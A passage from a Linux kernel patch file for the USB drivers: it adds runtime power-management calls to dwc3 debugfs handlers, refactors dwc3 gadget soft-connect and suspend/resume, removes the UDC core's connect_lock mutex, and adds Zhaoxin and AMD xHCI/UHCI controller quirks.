+--- a/drivers/usb/dwc3/debugfs.c
++++ b/drivers/usb/dwc3/debugfs.c
+@@ -327,6 +327,11 @@ static int dwc3_lsp_show(struct seq_file *s, void *unused)
+ 	unsigned int		current_mode;
+ 	unsigned long		flags;
+ 	u32			reg;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	reg = dwc3_readl(dwc->regs, DWC3_GSTS);
+@@ -345,6 +350,8 @@ static int dwc3_lsp_show(struct seq_file *s, void *unused)
+ 	}
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -390,6 +397,11 @@ static int dwc3_mode_show(struct seq_file *s, void *unused)
+ 	struct dwc3		*dwc = s->private;
+ 	unsigned long		flags;
+ 	u32			reg;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	reg = dwc3_readl(dwc->regs, DWC3_GCTL);
+@@ -409,6 +421,8 @@ static int dwc3_mode_show(struct seq_file *s, void *unused)
+ 		seq_printf(s, "UNKNOWN %08x\n", DWC3_GCTL_PRTCAP(reg));
+ 	}
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -458,6 +472,11 @@ static int dwc3_testmode_show(struct seq_file *s, void *unused)
+ 	struct dwc3		*dwc = s->private;
+ 	unsigned long		flags;
+ 	u32			reg;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	reg = dwc3_readl(dwc->regs, DWC3_DCTL);
+@@ -488,6 +507,8 @@ static int dwc3_testmode_show(struct seq_file *s, void *unused)
+ 		seq_printf(s, "UNKNOWN %d\n", reg);
+ 	}
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -504,6 +525,7 @@ static ssize_t dwc3_testmode_write(struct file *file,
+ 	unsigned long		flags;
+ 	u32			testmode = 0;
+ 	char			buf[32];
++	int			ret;
+ 
+ 	if (copy_from_user(&buf, ubuf, min_t(size_t, sizeof(buf) - 1, count)))
+ 		return -EFAULT;
+@@ -521,10 +543,16 @@ static ssize_t dwc3_testmode_write(struct file *file,
+ 	else
+ 		testmode = 0;
+ 
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
++
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	dwc3_gadget_set_test_mode(dwc, testmode);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return count;
+ }
+ 
+@@ -543,12 +571,18 @@ static int dwc3_link_state_show(struct seq_file *s, void *unused)
+ 	enum dwc3_link_state	state;
+ 	u32			reg;
+ 	u8			speed;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	reg = dwc3_readl(dwc->regs, DWC3_GSTS);
+ 	if (DWC3_GSTS_CURMOD(reg) != DWC3_GSTS_CURMOD_DEVICE) {
+ 		seq_puts(s, "Not available\n");
+ 		spin_unlock_irqrestore(&dwc->lock, flags);
++		pm_runtime_put_sync(dwc->dev);
+ 		return 0;
+ 	}
+ 
+@@ -561,6 +595,8 @@ static int dwc3_link_state_show(struct seq_file *s, void *unused)
+ 		   dwc3_gadget_hs_link_string(state));
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -579,6 +615,7 @@ static ssize_t dwc3_link_state_write(struct file *file,
+ 	char			buf[32];
+ 	u32			reg;
+ 	u8			speed;
++	int			ret;
+ 
+ 	if (copy_from_user(&buf, ubuf, min_t(size_t, sizeof(buf) - 1, count)))
+ 		return -EFAULT;
+@@ -598,10 +635,15 @@ static ssize_t dwc3_link_state_write(struct file *file,
+ 	else
+ 		return -EINVAL;
+ 
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
++
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	reg = dwc3_readl(dwc->regs, DWC3_GSTS);
+ 	if (DWC3_GSTS_CURMOD(reg) != DWC3_GSTS_CURMOD_DEVICE) {
+ 		spin_unlock_irqrestore(&dwc->lock, flags);
++		pm_runtime_put_sync(dwc->dev);
+ 		return -EINVAL;
+ 	}
+ 
+@@ -611,12 +653,15 @@ static ssize_t dwc3_link_state_write(struct file *file,
+ 	if (speed < DWC3_DSTS_SUPERSPEED &&
+ 	    state != DWC3_LINK_STATE_RECOV) {
+ 		spin_unlock_irqrestore(&dwc->lock, flags);
++		pm_runtime_put_sync(dwc->dev);
+ 		return -EINVAL;
+ 	}
+ 
+ 	dwc3_gadget_set_link_state(dwc, state);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return count;
+ }
+ 
+@@ -640,6 +685,11 @@ static int dwc3_tx_fifo_size_show(struct seq_file *s, void *unused)
+ 	unsigned long		flags;
+ 	u32			mdwidth;
+ 	u32			val;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	val = dwc3_core_fifo_space(dep, DWC3_TXFIFO);
+@@ -652,6 +702,8 @@ static int dwc3_tx_fifo_size_show(struct seq_file *s, void *unused)
+ 	seq_printf(s, "%u\n", val);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -662,6 +714,11 @@ static int dwc3_rx_fifo_size_show(struct seq_file *s, void *unused)
+ 	unsigned long		flags;
+ 	u32			mdwidth;
+ 	u32			val;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	val = dwc3_core_fifo_space(dep, DWC3_RXFIFO);
+@@ -674,6 +731,8 @@ static int dwc3_rx_fifo_size_show(struct seq_file *s, void *unused)
+ 	seq_printf(s, "%u\n", val);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -683,12 +742,19 @@ static int dwc3_tx_request_queue_show(struct seq_file *s, void *unused)
+ 	struct dwc3		*dwc = dep->dwc;
+ 	unsigned long		flags;
+ 	u32			val;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	val = dwc3_core_fifo_space(dep, DWC3_TXREQQ);
+ 	seq_printf(s, "%u\n", val);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -698,12 +764,19 @@ static int dwc3_rx_request_queue_show(struct seq_file *s, void *unused)
+ 	struct dwc3		*dwc = dep->dwc;
+ 	unsigned long		flags;
+ 	u32			val;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	val = dwc3_core_fifo_space(dep, DWC3_RXREQQ);
+ 	seq_printf(s, "%u\n", val);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -713,12 +786,19 @@ static int dwc3_rx_info_queue_show(struct seq_file *s, void *unused)
+ 	struct dwc3		*dwc = dep->dwc;
+ 	unsigned long		flags;
+ 	u32			val;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	val = dwc3_core_fifo_space(dep, DWC3_RXINFOQ);
+ 	seq_printf(s, "%u\n", val);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -728,12 +808,19 @@ static int dwc3_descriptor_fetch_queue_show(struct seq_file *s, void *unused)
+ 	struct dwc3		*dwc = dep->dwc;
+ 	unsigned long		flags;
+ 	u32			val;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	val = dwc3_core_fifo_space(dep, DWC3_DESCFETCHQ);
+ 	seq_printf(s, "%u\n", val);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -743,12 +830,19 @@ static int dwc3_event_queue_show(struct seq_file *s, void *unused)
+ 	struct dwc3		*dwc = dep->dwc;
+ 	unsigned long		flags;
+ 	u32			val;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	val = dwc3_core_fifo_space(dep, DWC3_EVENTQ);
+ 	seq_printf(s, "%u\n", val);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -793,6 +887,11 @@ static int dwc3_trb_ring_show(struct seq_file *s, void *unused)
+ 	struct dwc3		*dwc = dep->dwc;
+ 	unsigned long		flags;
+ 	int			i;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	if (dep->number <= 1) {
+@@ -822,6 +921,8 @@ static int dwc3_trb_ring_show(struct seq_file *s, void *unused)
+ out:
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -834,6 +935,11 @@ static int dwc3_ep_info_register_show(struct seq_file *s, void *unused)
+ 	u32			lower_32_bits;
+ 	u32			upper_32_bits;
+ 	u32			reg;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	reg = DWC3_GDBGLSPMUX_EPSELECT(dep->number);
+@@ -846,6 +952,8 @@ static int dwc3_ep_info_register_show(struct seq_file *s, void *unused)
+ 	seq_printf(s, "0x%016llx\n", ep_info);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -905,6 +1013,7 @@ void dwc3_debugfs_init(struct dwc3 *dwc)
+ 	dwc->regset->regs = dwc3_regs;
+ 	dwc->regset->nregs = ARRAY_SIZE(dwc3_regs);
+ 	dwc->regset->base = dwc->regs - DWC3_GLOBALS_REGS_START;
++	dwc->regset->dev = dwc->dev;
+ 
+ 	root = debugfs_create_dir(dev_name(dwc->dev), usb_debug_root);
+ 	dwc->debug_root = root;
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index daa7673833557..d12cb8f0d1f48 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -2587,6 +2587,21 @@ static int dwc3_gadget_soft_disconnect(struct dwc3 *dwc)
+ 	return ret;
+ }
+ 
++static int dwc3_gadget_soft_connect(struct dwc3 *dwc)
++{
++	/*
++	 * In the Synopsys DWC_usb31 1.90a programming guide section
++	 * 4.1.9, it specifies that for a reconnect after a
++	 * device-initiated disconnect requires a core soft reset
++	 * (DCTL.CSftRst) before enabling the run/stop bit.
++	 */
++	dwc3_core_soft_reset(dwc);
++
++	dwc3_event_buffers_setup(dwc);
++	__dwc3_gadget_start(dwc);
++	return dwc3_gadget_run_stop(dwc, true);
++}
++
+ static int dwc3_gadget_pullup(struct usb_gadget *g, int is_on)
+ {
+ 	struct dwc3		*dwc = gadget_to_dwc(g);
+@@ -2625,21 +2640,10 @@ static int dwc3_gadget_pullup(struct usb_gadget *g, int is_on)
+ 
+ 	synchronize_irq(dwc->irq_gadget);
+ 
+-	if (!is_on) {
++	if (!is_on)
+ 		ret = dwc3_gadget_soft_disconnect(dwc);
+-	} else {
+-		/*
+-		 * In the Synopsys DWC_usb31 1.90a programming guide section
+-		 * 4.1.9, it specifies that for a reconnect after a
+-		 * device-initiated disconnect requires a core soft reset
+-		 * (DCTL.CSftRst) before enabling the run/stop bit.
+-		 */
+-		dwc3_core_soft_reset(dwc);
+-
+-		dwc3_event_buffers_setup(dwc);
+-		__dwc3_gadget_start(dwc);
+-		ret = dwc3_gadget_run_stop(dwc, true);
+-	}
++	else
++		ret = dwc3_gadget_soft_connect(dwc);
+ 
+ 	pm_runtime_put(dwc->dev);
+ 
+@@ -4555,42 +4559,39 @@ void dwc3_gadget_exit(struct dwc3 *dwc)
+ int dwc3_gadget_suspend(struct dwc3 *dwc)
+ {
+ 	unsigned long flags;
++	int ret;
+ 
+ 	if (!dwc->gadget_driver)
+ 		return 0;
+ 
+-	dwc3_gadget_run_stop(dwc, false);
++	ret = dwc3_gadget_soft_disconnect(dwc);
++	if (ret)
++		goto err;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	dwc3_disconnect_gadget(dwc);
+-	__dwc3_gadget_stop(dwc);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
+ 	return 0;
++
++err:
++	/*
++	 * Attempt to reset the controller's state. Likely no
++	 * communication can be established until the host
++	 * performs a port reset.
++	 */
++	if (dwc->softconnect)
++		dwc3_gadget_soft_connect(dwc);
++
++	return ret;
+ }
+ 
+ int dwc3_gadget_resume(struct dwc3 *dwc)
+ {
+-	int			ret;
+-
+ 	if (!dwc->gadget_driver || !dwc->softconnect)
+ 		return 0;
+ 
+-	ret = __dwc3_gadget_start(dwc);
+-	if (ret < 0)
+-		goto err0;
+-
+-	ret = dwc3_gadget_run_stop(dwc, true);
+-	if (ret < 0)
+-		goto err1;
+-
+-	return 0;
+-
+-err1:
+-	__dwc3_gadget_stop(dwc);
+-
+-err0:
+-	return ret;
++	return dwc3_gadget_soft_connect(dwc);
+ }
+ 
+ void dwc3_gadget_process_pending_events(struct dwc3 *dwc)
+diff --git a/drivers/usb/gadget/function/u_ether.c b/drivers/usb/gadget/function/u_ether.c
+index e06022873df16..1f420ff8f4232 100644
+--- a/drivers/usb/gadget/function/u_ether.c
++++ b/drivers/usb/gadget/function/u_ether.c
+@@ -17,6 +17,7 @@
+ #include <linux/etherdevice.h>
+ #include <linux/ethtool.h>
+ #include <linux/if_vlan.h>
++#include <linux/string_helpers.h>
+ 
+ #include "u_ether.h"
+ 
+@@ -978,6 +979,8 @@ int gether_get_host_addr_cdc(struct net_device *net, char *host_addr, int len)
+ 	dev = netdev_priv(net);
+ 	snprintf(host_addr, len, "%pm", dev->host_mac);
+ 
++	string_upper(host_addr, host_addr);
++
+ 	return strlen(host_addr);
+ }
+ EXPORT_SYMBOL_GPL(gether_get_host_addr_cdc);
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index e85706812d61e..bf9878e1a72a8 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -37,10 +37,6 @@ static struct bus_type gadget_bus_type;
+  * @vbus: for udcs who care about vbus status, this value is real vbus status;
+  * for udcs who do not care about vbus status, this value is always true
+  * @started: the UDC's started state. True if the UDC had started.
+- * @connect_lock: protects udc->vbus, udc->started, gadget->connect, gadget->deactivate related
+- * functions. usb_gadget_connect_locked, usb_gadget_disconnect_locked,
+- * usb_udc_connect_control_locked, usb_gadget_udc_start_locked, usb_gadget_udc_stop_locked are
+- * called with this lock held.
+  *
+  * This represents the internal data structure which is used by the UDC-class
+  * to hold information about udc driver and gadget together.
+@@ -52,7 +48,6 @@ struct usb_udc {
+ 	struct list_head		list;
+ 	bool				vbus;
+ 	bool				started;
+-	struct mutex			connect_lock;
+ };
+ 
+ static struct class *udc_class;
+@@ -665,9 +660,17 @@ out:
+ }
+ EXPORT_SYMBOL_GPL(usb_gadget_vbus_disconnect);
+ 
+-/* Internal version of usb_gadget_connect needs to be called with connect_lock held. */
+-static int usb_gadget_connect_locked(struct usb_gadget *gadget)
+-	__must_hold(&gadget->udc->connect_lock)
++/**
++ * usb_gadget_connect - software-controlled connect to USB host
++ * @gadget:the peripheral being connected
++ *
++ * Enables the D+ (or potentially D-) pullup.  The host will start
++ * enumerating this gadget when the pullup is active and a VBUS session
++ * is active (the link is powered).
++ *
++ * Returns zero on success, else negative errno.
++ */
++int usb_gadget_connect(struct usb_gadget *gadget)
+ {
+ 	int ret = 0;
+ 
+@@ -676,15 +679,10 @@ static int usb_gadget_connect_locked(struct usb_gadget *gadget)
+ 		goto out;
+ 	}
+ 
+-	if (gadget->connected)
+-		goto out;
+-
+-	if (gadget->deactivated || !gadget->udc->started) {
++	if (gadget->deactivated) {
+ 		/*
+ 		 * If gadget is deactivated we only save new state.
+ 		 * Gadget will be connected automatically after activation.
+-		 *
+-		 * udc first needs to be started before gadget can be pulled up.
+ 		 */
+ 		gadget->connected = true;
+ 		goto out;
+@@ -699,32 +697,22 @@ out:
+ 
+ 	return ret;
+ }
++EXPORT_SYMBOL_GPL(usb_gadget_connect);
+ 
+ /**
+- * usb_gadget_connect - software-controlled connect to USB host
+- * @gadget:the peripheral being connected
++ * usb_gadget_disconnect - software-controlled disconnect from USB host
++ * @gadget:the peripheral being disconnected
+  *
+- * Enables the D+ (or potentially D-) pullup.  The host will start
+- * enumerating this gadget when the pullup is active and a VBUS session
+- * is active (the link is powered).
++ * Disables the D+ (or potentially D-) pullup, which the host may see
++ * as a disconnect (when a VBUS session is active).  Not all systems
++ * support software pullup controls.
++ *
++ * Following a successful disconnect, invoke the ->disconnect() callback
++ * for the current gadget driver so that UDC drivers don't need to.
+  *
+  * Returns zero on success, else negative errno.
+  */
+-int usb_gadget_connect(struct usb_gadget *gadget)
+-{
+-	int ret;
+-
+-	mutex_lock(&gadget->udc->connect_lock);
+-	ret = usb_gadget_connect_locked(gadget);
+-	mutex_unlock(&gadget->udc->connect_lock);
+-
+-	return ret;
+-}
+-EXPORT_SYMBOL_GPL(usb_gadget_connect);
+-
+-/* Internal version of usb_gadget_disconnect needs to be called with connect_lock held. */
+-static int usb_gadget_disconnect_locked(struct usb_gadget *gadget)
+-	__must_hold(&gadget->udc->connect_lock)
++int usb_gadget_disconnect(struct usb_gadget *gadget)
+ {
+ 	int ret = 0;
+ 
+@@ -736,12 +724,10 @@ static int usb_gadget_disconnect_locked(struct usb_gadget *gadget)
+ 	if (!gadget->connected)
+ 		goto out;
+ 
+-	if (gadget->deactivated || !gadget->udc->started) {
++	if (gadget->deactivated) {
+ 		/*
+ 		 * If gadget is deactivated we only save new state.
+ 		 * Gadget will stay disconnected after activation.
+-		 *
+-		 * udc should have been started before gadget being pulled down.
+ 		 */
+ 		gadget->connected = false;
+ 		goto out;
+@@ -761,30 +747,6 @@ out:
+ 
+ 	return ret;
+ }
+-
+-/**
+- * usb_gadget_disconnect - software-controlled disconnect from USB host
+- * @gadget:the peripheral being disconnected
+- *
+- * Disables the D+ (or potentially D-) pullup, which the host may see
+- * as a disconnect (when a VBUS session is active).  Not all systems
+- * support software pullup controls.
+- *
+- * Following a successful disconnect, invoke the ->disconnect() callback
+- * for the current gadget driver so that UDC drivers don't need to.
+- *
+- * Returns zero on success, else negative errno.
+- */
+-int usb_gadget_disconnect(struct usb_gadget *gadget)
+-{
+-	int ret;
+-
+-	mutex_lock(&gadget->udc->connect_lock);
+-	ret = usb_gadget_disconnect_locked(gadget);
+-	mutex_unlock(&gadget->udc->connect_lock);
+-
+-	return ret;
+-}
+ EXPORT_SYMBOL_GPL(usb_gadget_disconnect);
+ 
+ /**
+@@ -805,11 +767,10 @@ int usb_gadget_deactivate(struct usb_gadget *gadget)
+ 	if (gadget->deactivated)
+ 		goto out;
+ 
+-	mutex_lock(&gadget->udc->connect_lock);
+ 	if (gadget->connected) {
+-		ret = usb_gadget_disconnect_locked(gadget);
++		ret = usb_gadget_disconnect(gadget);
+ 		if (ret)
+-			goto unlock;
++			goto out;
+ 
+ 		/*
+ 		 * If gadget was being connected before deactivation, we want
+@@ -819,8 +780,6 @@ int usb_gadget_deactivate(struct usb_gadget *gadget)
+ 	}
+ 	gadget->deactivated = true;
+ 
+-unlock:
+-	mutex_unlock(&gadget->udc->connect_lock);
+ out:
+ 	trace_usb_gadget_deactivate(gadget, ret);
+ 
+@@ -844,7 +803,6 @@ int usb_gadget_activate(struct usb_gadget *gadget)
+ 	if (!gadget->deactivated)
+ 		goto out;
+ 
+-	mutex_lock(&gadget->udc->connect_lock);
+ 	gadget->deactivated = false;
+ 
+ 	/*
+@@ -852,8 +810,7 @@ int usb_gadget_activate(struct usb_gadget *gadget)
+ 	 * while it was being deactivated, we call usb_gadget_connect().
+ 	 */
+ 	if (gadget->connected)
+-		ret = usb_gadget_connect_locked(gadget);
+-	mutex_unlock(&gadget->udc->connect_lock);
++		ret = usb_gadget_connect(gadget);
+ 
+ out:
+ 	trace_usb_gadget_activate(gadget, ret);
+@@ -1094,13 +1051,12 @@ EXPORT_SYMBOL_GPL(usb_gadget_set_state);
+ 
+ /* ------------------------------------------------------------------------- */
+ 
+-/* Acquire connect_lock before calling this function. */
+-static void usb_udc_connect_control_locked(struct usb_udc *udc) __must_hold(&udc->connect_lock)
++static void usb_udc_connect_control(struct usb_udc *udc)
+ {
+-	if (udc->vbus && udc->started)
+-		usb_gadget_connect_locked(udc->gadget);
++	if (udc->vbus)
++		usb_gadget_connect(udc->gadget);
+ 	else
+-		usb_gadget_disconnect_locked(udc->gadget);
++		usb_gadget_disconnect(udc->gadget);
+ }
+ 
+ /**
+@@ -1116,12 +1072,10 @@ void usb_udc_vbus_handler(struct usb_gadget *gadget, bool status)
+ {
+ 	struct usb_udc *udc = gadget->udc;
+ 
+-	mutex_lock(&udc->connect_lock);
+ 	if (udc) {
+ 		udc->vbus = status;
+-		usb_udc_connect_control_locked(udc);
++		usb_udc_connect_control(udc);
+ 	}
+-	mutex_unlock(&udc->connect_lock);
+ }
+ EXPORT_SYMBOL_GPL(usb_udc_vbus_handler);
+ 
+@@ -1143,7 +1097,7 @@ void usb_gadget_udc_reset(struct usb_gadget *gadget,
+ EXPORT_SYMBOL_GPL(usb_gadget_udc_reset);
+ 
+ /**
+- * usb_gadget_udc_start_locked - tells usb device controller to start up
++ * usb_gadget_udc_start - tells usb device controller to start up
+  * @udc: The UDC to be started
+  *
+  * This call is issued by the UDC Class driver when it's about
+@@ -1154,11 +1108,8 @@ EXPORT_SYMBOL_GPL(usb_gadget_udc_reset);
+  * necessary to have it powered on.
+  *
+  * Returns zero on success, else negative errno.
+- *
+- * Caller should acquire connect_lock before invoking this function.
+  */
+-static inline int usb_gadget_udc_start_locked(struct usb_udc *udc)
+-	__must_hold(&udc->connect_lock)
++static inline int usb_gadget_udc_start(struct usb_udc *udc)
+ {
+ 	int ret;
+ 
+@@ -1175,7 +1126,7 @@ static inline int usb_gadget_udc_start_locked(struct usb_udc *udc)
+ }
+ 
+ /**
+- * usb_gadget_udc_stop_locked - tells usb device controller we don't need it anymore
++ * usb_gadget_udc_stop - tells usb device controller we don't need it anymore
+  * @udc: The UDC to be stopped
+  *
+  * This call is issued by the UDC Class driver after calling
+@@ -1184,11 +1135,8 @@ static inline int usb_gadget_udc_start_locked(struct usb_udc *udc)
+  * The details are implementation specific, but it can go as
+  * far as powering off UDC completely and disable its data
+  * line pullups.
+- *
+- * Caller should acquire connect lock before invoking this function.
+  */
+-static inline void usb_gadget_udc_stop_locked(struct usb_udc *udc)
+-	__must_hold(&udc->connect_lock)
++static inline void usb_gadget_udc_stop(struct usb_udc *udc)
+ {
+ 	if (!udc->started) {
+ 		dev_err(&udc->dev, "UDC had already stopped\n");
+@@ -1347,7 +1295,6 @@ int usb_add_gadget(struct usb_gadget *gadget)
+ 
+ 	udc->gadget = gadget;
+ 	gadget->udc = udc;
+-	mutex_init(&udc->connect_lock);
+ 
+ 	udc->started = false;
+ 
+@@ -1549,15 +1496,11 @@ static int gadget_bind_driver(struct device *dev)
+ 	if (ret)
+ 		goto err_bind;
+ 
+-	mutex_lock(&udc->connect_lock);
+-	ret = usb_gadget_udc_start_locked(udc);
+-	if (ret) {
+-		mutex_unlock(&udc->connect_lock);
++	ret = usb_gadget_udc_start(udc);
++	if (ret)
+ 		goto err_start;
+-	}
+ 	usb_gadget_enable_async_callbacks(udc);
+-	usb_udc_connect_control_locked(udc);
+-	mutex_unlock(&udc->connect_lock);
++	usb_udc_connect_control(udc);
+ 
+ 	kobject_uevent(&udc->dev.kobj, KOBJ_CHANGE);
+ 	return 0;
+@@ -1588,14 +1531,12 @@ static void gadget_unbind_driver(struct device *dev)
+ 
+ 	kobject_uevent(&udc->dev.kobj, KOBJ_CHANGE);
+ 
+-	mutex_lock(&udc->connect_lock);
+-	usb_gadget_disconnect_locked(gadget);
++	usb_gadget_disconnect(gadget);
+ 	usb_gadget_disable_async_callbacks(udc);
+ 	if (gadget->irq)
+ 		synchronize_irq(gadget->irq);
+ 	udc->driver->unbind(gadget);
+-	usb_gadget_udc_stop_locked(udc);
+-	mutex_unlock(&udc->connect_lock);
++	usb_gadget_udc_stop(udc);
+ 
+ 	mutex_lock(&udc_lock);
+ 	driver->is_bound = false;
+@@ -1681,15 +1622,11 @@ static ssize_t soft_connect_store(struct device *dev,
+ 	}
+ 
+ 	if (sysfs_streq(buf, "connect")) {
+-		mutex_lock(&udc->connect_lock);
+-		usb_gadget_udc_start_locked(udc);
+-		usb_gadget_connect_locked(udc->gadget);
+-		mutex_unlock(&udc->connect_lock);
++		usb_gadget_udc_start(udc);
++		usb_gadget_connect(udc->gadget);
+ 	} else if (sysfs_streq(buf, "disconnect")) {
+-		mutex_lock(&udc->connect_lock);
+-		usb_gadget_disconnect_locked(udc->gadget);
+-		usb_gadget_udc_stop_locked(udc);
+-		mutex_unlock(&udc->connect_lock);
++		usb_gadget_disconnect(udc->gadget);
++		usb_gadget_udc_stop(udc);
+ 	} else {
+ 		dev_err(dev, "unsupported command '%s'\n", buf);
+ 		ret = -EINVAL;
+diff --git a/drivers/usb/host/uhci-pci.c b/drivers/usb/host/uhci-pci.c
+index 3592f757fe05d..7bd2fddde770a 100644
+--- a/drivers/usb/host/uhci-pci.c
++++ b/drivers/usb/host/uhci-pci.c
+@@ -119,11 +119,13 @@ static int uhci_pci_init(struct usb_hcd *hcd)
+ 
+ 	uhci->rh_numports = uhci_count_ports(hcd);
+ 
+-	/* Intel controllers report the OverCurrent bit active on.
+-	 * VIA controllers report it active off, so we'll adjust the
+-	 * bit value.  (It's not standardized in the UHCI spec.)
++	/*
++	 * Intel controllers report the OverCurrent bit active on.  VIA
++	 * and ZHAOXIN controllers report it active off, so we'll adjust
++	 * the bit value.  (It's not standardized in the UHCI spec.)
+ 	 */
+-	if (to_pci_dev(uhci_dev(uhci))->vendor == PCI_VENDOR_ID_VIA)
++	if (to_pci_dev(uhci_dev(uhci))->vendor == PCI_VENDOR_ID_VIA ||
++			to_pci_dev(uhci_dev(uhci))->vendor == PCI_VENDOR_ID_ZHAOXIN)
+ 		uhci->oc_low = 1;
+ 
+ 	/* HP's server management chip requires a longer port reset delay. */
+diff --git a/drivers/usb/host/xhci-pci.c b/drivers/usb/host/xhci-pci.c
+index 232e175e4e964..6e4dac71c409e 100644
+--- a/drivers/usb/host/xhci-pci.c
++++ b/drivers/usb/host/xhci-pci.c
+@@ -13,6 +13,7 @@
+ #include <linux/module.h>
+ #include <linux/acpi.h>
+ #include <linux/reset.h>
++#include <linux/suspend.h>
+ 
+ #include "xhci.h"
+ #include "xhci-trace.h"
+@@ -194,7 +195,7 @@ static void xhci_pci_quirks(struct device *dev, struct xhci_hcd *xhci)
+ 
+ 	if (pdev->vendor == PCI_VENDOR_ID_AMD &&
+ 		pdev->device == PCI_DEVICE_ID_AMD_RENOIR_XHCI)
+-		xhci->quirks |= XHCI_BROKEN_D3COLD;
++		xhci->quirks |= XHCI_BROKEN_D3COLD_S2I;
+ 
+ 	if (pdev->vendor == PCI_VENDOR_ID_INTEL) {
+ 		xhci->quirks |= XHCI_LPM_SUPPORT;
+@@ -609,9 +610,16 @@ static int xhci_pci_suspend(struct usb_hcd *hcd, bool do_wakeup)
+ 	 * Systems with the TI redriver that loses port status change events
+ 	 * need to have the registers polled during D3, so avoid D3cold.
+ 	 */
+-	if (xhci->quirks & (XHCI_COMP_MODE_QUIRK | XHCI_BROKEN_D3COLD))
++	if (xhci->quirks & XHCI_COMP_MODE_QUIRK)
+ 		pci_d3cold_disable(pdev);
+ 
++#ifdef CONFIG_SUSPEND
++	/* d3cold is broken, but only when s2idle is used */
++	if (pm_suspend_target_state == PM_SUSPEND_TO_IDLE &&
++	    xhci->quirks & (XHCI_BROKEN_D3COLD_S2I))
++		pci_d3cold_disable(pdev);
++#endif
++
+ 	if (xhci->quirks & XHCI_PME_STUCK_QUIRK)
+ 		xhci_pme_quirk(hcd);
+ 
